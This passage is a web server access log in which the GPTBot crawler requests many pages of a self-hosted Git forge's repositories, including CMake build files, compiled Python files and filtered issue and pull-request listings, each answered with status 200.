AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:18:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:18:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12452] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:18:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2ftempCodeRunnerFile.py" [Client 74.7.227.38] [Length 27492] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:18:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13144] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 